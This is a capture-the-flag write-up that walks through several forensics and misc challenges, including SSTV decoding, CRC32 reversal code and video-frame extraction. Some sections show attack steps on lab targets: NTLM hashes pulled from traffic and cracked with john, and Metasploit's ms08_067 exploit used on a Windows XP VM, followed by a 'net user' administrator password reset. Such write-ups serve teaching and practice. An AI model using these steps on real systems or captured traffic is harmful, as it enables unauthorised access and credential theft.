Guess the dimensions are 40*22 and assemble: montage *.bmp -tile 40x22 -geometry +0+0 ../out.png
Solve the jigsaw: gaps --image=out.png --size=48 --save
This gives the text XzE0X0tpMTE0Un0==, which base64-decodes to the second half of the flag: _14_Ki114R}.
Extract the SSTV image from the mp3: sstv -d L1.wav -o 1.png
The text in the resulting image is the first half of the flag: SYC{H4xr0t0r.
flag:SYC{H4xr0t0r_14_Ki114R}
Overheard (窃听风云)
Hacker captured a conversation stream from a rival company; can you work out Jack's password from the traffic? The flag is SYC{password}
NTLMSSP traffic. Extract the NTLM hash with the ntlmssp_extract tool:
jack::WIDGETLLC:2af71b5ca7246268:2d1d24572b15fe544043431c59965d30:...
Save it to a hash file and crack it with john:
john hash --wordlist=rockyou.txt
Result: iamjackspassword (jack)
flag:SYC{iamjackspassword}
extractMe
Try to extract me!
4-byte CRC32 reversal; use CRC32 Tools to reverse each of the 8 strings separately:
python crc32.py reverse 0xXXXXXXXX
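Added example (not the CRC32 Tools script the writeup uses): why a 4-byte input can be recovered from its CRC32 exactly rather than brute-forced. CRC32 over four bytes is a bijection, and each byte's table index is fixed by the top byte of the state after it (the table's top bytes are a permutation of 0..255), so one backward pass plus one forward pass from the fixed initial state yields the unique preimage. Inputs longer than 4 bytes have many preimages and are not covered.

```python
import zlib

POLY = 0xEDB88320               # reflected CRC-32 polynomial, as used by zip and zlib

def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table

TABLE = _make_table()
# Inverse lookup on the top byte of each table entry; these 256 top bytes are all distinct.
TOP_TO_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}

def crc32(data):
    """Reference forward computation (matches zlib.crc32)."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF

def reverse_crc32_4(target):
    """The unique 4-byte input whose CRC32 equals target."""
    # Backward pass: after byte i the state is TABLE[idx_i] ^ (prev >> 8), and prev >> 8 has a zero
    # top byte, so the top byte of the state identifies idx_i. The low byte of prev stays unknown
    # but is never needed, since the next step only looks at prev's top byte.
    state = target ^ 0xFFFFFFFF
    indices = []
    for _ in range(4):
        idx = TOP_TO_INDEX[state >> 24]
        indices.append(idx)
        state = ((state ^ TABLE[idx]) << 8) & 0xFFFFFFFF
    indices.reverse()
    # Forward pass from the known initial state turns each index into the byte that produced it.
    crc = 0xFFFFFFFF
    out = bytearray()
    for idx in indices:
        out.append(idx ^ (crc & 0xFF))
        crc = TABLE[idx] ^ (crc >> 8)
    return bytes(out)
```

If the recovered four bytes are printable they are the original segment; there is no other candidate to rank.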
Concatenating gives the flag: SYC{_cR@ck_1s_Useful_sometime$_}
Tears of the Era (时代的眼泪)
A fat-backed PC from 2001: how badly does it get beaten up in 2023? Link: https://pan.baidu.com/s/1GuvryuThIMn_fzhstWaKBA?pwd=geek Extraction code: geek
A Windows XP VM; load it in VMware, but no login password is available.
Reference: using MSF with ms08_067 against XP
First scan the subnet for the IP: nmap -sC -sV 192.168.79.0/24
With the IP known, attack with MSF:
msf6 > search ms08_067
After getting a shell, change the administrator password with net:
net user administrator 123456
Log in; the desktop wallpaper gives the flag: SYC{You_defeated_me_after_22_years}.
SimpleConnect
Just so so. A blockchain challenge. Link: http://47.109.106.62:1234/
Compile with Remix and call airdrop(), which satisfies the isSolved() condition and gives the flag: SYC{kajd_u_iaak___hdskj_a}.
give_me_Goerlieth
Great. A blockchain challenge. Link: http://47.109.106.62:1235/
Just transfer funds.
DEATH_N2TE
"You learned the truth and are about to flee with the DEATH NOTE when Muscial sends you a video and says:" "[This records his real name and photo; write them in that notebook. Arahat0 and I have both had our real names seen by him...]".
Split the mp4 into frames: ffmpeg -i kira.mp4 %05d.png
Extract a column from each frame and combine them:
from PIL import Image
With start=5, the flag is: SYC{we1c0m4_T0_De@tH_W0r1d}.
Overheard V2 (窃听风云-V2)
This time Hacker captured Jack logging in to the mail system; can you still recover Jack's password from the traffic? The flag is SYC{password}
SMTP traffic; have Wireshark dissect the ntlmssp and, following
Extracting NTLM Hash Values from a Wireshark packet capture,
build the ntlmssp line:
jack::WidgetLLC.Internal:3e3966c8cacd29f7:ddd46fd8f78c262eae16918f66185497:...
Then crack it with john: john token.txt --wordlist=rockyou.txt
Result: jack100589barney (jack), flag: SYC{jack100589barney}.